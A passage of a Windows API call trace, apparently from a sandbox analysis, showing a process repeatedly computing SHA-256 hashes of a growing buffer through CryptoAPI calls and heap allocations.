	[0239.778] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.778] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0239.778] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.778] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf608
	[0239.778] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf608, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf608, pdwDataLen=0x128ba4) returned 1
	[0239.778] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.778] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.778] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.779] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.779] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0239.779] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.779] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf630
	[0239.779] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27bf630, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf630, pdwDataLen=0x128ba4) returned 1
	[0239.779] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.779] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.779] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.780] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.780] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0239.780] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf6d0
	[0239.780] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf6d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf6d0, pdwDataLen=0x128ba4) returned 1
	[0239.780] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.780] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.780] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.780] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.780] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0239.780] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.780] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf6f8
	[0239.780] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27bf6f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf6f8, pdwDataLen=0x128ba4) returned 1
	[0239.780] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.780] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.780] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.781] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.781] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0239.781] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf720
	[0239.781] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf720, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf720, pdwDataLen=0x128ba4) returned 1
	[0239.781] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.781] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.781] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.781] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.781] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0239.781] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.781] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf748
	[0239.781] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27bf748, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf748, pdwDataLen=0x128ba4) returned 1
	[0239.781] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.782] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.782] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.782] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.782] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0239.782] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.782] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf770
	[0239.782] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27bf770, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf770, pdwDataLen=0x128ba4) returned 1
	[0239.782] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.782] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.782] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.783] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.783] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0239.783] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.783] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf798
	[0239.783] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27bf798, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27bf798, pdwDataLen=0x128ba4) returned 1
	[0239.783] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.783] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.783] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.783] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.783] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0239.783] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.783] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1cf0
	[0239.783] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1cf0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1cf0, pdwDataLen=0x128ba4) returned 1
	[0239.783] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.783] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.783] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.784] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.784] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0239.784] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.784] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1d18
	[0239.784] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1d18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1d18, pdwDataLen=0x128ba4) returned 1
	[0239.784] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.784] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.784] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.784] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.784] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0239.784] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.784] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1d40
	[0239.784] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1d40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1d40, pdwDataLen=0x128ba4) returned 1
	[0239.784] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.785] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.785] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.785] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.785] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0239.785] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.785] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1d68
	[0239.785] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1d68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1d68, pdwDataLen=0x128ba4) returned 1
	[0239.785] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.785] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.785] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.786] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.786] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0239.786] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.786] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1d90
	[0239.786] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1d90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1d90, pdwDataLen=0x128ba4) returned 1
	[0239.786] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.786] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.786] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.786] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.786] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0239.786] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.786] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1db8
	[0239.786] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1db8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1db8, pdwDataLen=0x128ba4) returned 1
	[0239.786] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.786] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.786] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.787] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.787] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0239.787] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.787] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1de0
	[0239.787] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1de0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1de0, pdwDataLen=0x128ba4) returned 1
	[0239.787] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.787] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.787] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.787] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.787] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0239.787] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.788] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1e08
	[0239.788] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1e08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1e08, pdwDataLen=0x128ba4) returned 1
	[0239.788] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.788] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.788] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.788] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.788] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0239.789] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1e30
	[0239.789] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1e30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1e30, pdwDataLen=0x128ba4) returned 1
	[0239.789] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.789] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.789] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.789] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.789] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0239.789] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.789] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1e58
	[0239.789] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1e58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1e58, pdwDataLen=0x128ba4) returned 1
	[0239.789] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.789] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.789] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.790] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.790] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0239.790] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.790] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1e80
	[0239.790] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1e80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1e80, pdwDataLen=0x128ba4) returned 1
	[0239.790] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.790] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.790] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.790] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.790] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0239.790] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.790] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1ea8
	[0239.790] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1ea8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1ea8, pdwDataLen=0x128ba4) returned 1
	[0239.790] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.790] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.790] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.791] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.791] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0239.791] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.791] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1ed0
	[0239.791] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1ed0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1ed0, pdwDataLen=0x128ba4) returned 1
	[0239.791] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.791] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.791] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.791] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.792] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0239.792] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1ef8
	[0239.792] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1ef8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1ef8, pdwDataLen=0x128ba4) returned 1
	[0239.792] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.792] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.792] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.792] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.792] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0239.792] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.792] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1f20
	[0239.792] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1f20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1f20, pdwDataLen=0x128ba4) returned 1
	[0239.792] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.792] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.792] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.793] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.793] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0239.793] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1f48
	[0239.793] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c1f48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1f48, pdwDataLen=0x128ba4) returned 1
	[0239.793] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.793] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.793] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.793] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.793] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0239.793] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c1f70
	[0239.793] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c1f70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c1f70, pdwDataLen=0x128ba4) returned 1
	[0239.793] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.793] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.794] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.794] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
